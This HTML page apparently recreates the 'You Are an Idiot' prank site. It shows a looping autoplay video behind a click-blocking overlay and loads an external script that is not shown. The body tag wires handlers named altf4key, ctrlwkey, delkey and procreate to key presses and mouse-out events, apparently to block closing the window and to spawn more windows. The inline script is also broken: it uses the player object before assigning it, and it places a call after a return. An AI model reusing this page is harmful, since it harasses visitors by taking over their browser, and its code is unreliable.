<!--messy code lol-->
<html>
	<head>
		<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
		
		<link rel="stylesheet" href="https://unpkg.com/purecss@0.6.2/build/pure-min.css" integrity="sha384-" crossorigin="anonymous"/>

      		<link rel="stylesheet" href="https://unpkg.com/purecss@0.6.2/build/grids-responsive-old-ie-min.css"/>

    		<link rel="stylesheet" href="https://unpkg.com/purecss@0.6.2/build/grids-responsive-min.css"/>

		<style>

      		.text-white {
        	 color: white;
      		}

      		.hidden {
       		 display: none;
     		}

     		 .vid-div {
       		  margin: 20px 0px;
       		  position: relative;
     		}

      		#vid-blocker {
       		 position: absolute;
       		 top: 0px;
      		 left: 0px;
      		 height: 100%;
     		 width: 100%;
     		 z-index: 5;
     		}

     		 #video-frame {
      		  width: 100%;
      		}
		
    		  @media only screen and (min-width: 1400px) {
     		   #video-frame {
      		    width: 100%;
      		  }
     		 }

     		 body {
       		 background-color: black;
     		 }
  		 </style>

		
		<title>Idiot!</title>

		<script src="./you.js"></script>

	</head>

<body onload="flagRun=1;playBall();return true;bookmark();" onkeydown="altf4key();ctrlwkey();delkey();" onmouseout="procreate();" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<style> .center { display: block; margin-left: auto; margin-right: auto; text-align: center; } </style>
<!--<img class="center" src="Idiot!_files/you-are-an-idiot.gif", width="950", height="700"></img>-->
    <div>
      <div class="vid-div">
        <div id="vid-blocker"></div>
        <iframe
          id="video-frame"
          src="https://www.youtube-nocookie.com/embed/gQAmu28Gw24?&enablejsapi=1&autoplay=1&loop=1&muted=1&playlist=gQAmu28Gw24"
          frameborder="0"
          allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture"
          allowfullscreen
        ></iframe>
      </div>
    </div>
    <script type="text/javascript">
      var player;
      var frame = document.querySelector("#video-frame");
      var cookieConsent = document.querySelector("#cookie-consent");
      var firstScriptTag = document.querySelector("script");
      var tag = document.createElement("script");
      tag.id = "iframe-demo";
      tag.src = "https://www.youtube.com/iframe_api";
      frame.setAttribute("height", Math.floor(frame.clientWidth * 0.6));

      player.seekTo(0);
      player.unMute();

      function onYouTubeIframeAPIReady() {
        player = new YT.Player("video-frame");
      }

      firstScriptTag.parentNode.insertBefore(tag, firstScriptTag);
    </script>

    <!-- Global site tag (gtag.js) - Google Analytics -->
    <script
      async
      src="https://www.googletagmanager.com/gtag/js?id=UA-94067710-2"
    ></script>
    <script>
      window.dataLayer = window.dataLayer || [];
      function gtag() {
        dataLayer.push(arguments);
      }
      gtag("js", new Date());

      gtag("config", "UA-94067710-2", { anonymize_ip: true });
    </script>



</body>
</html>
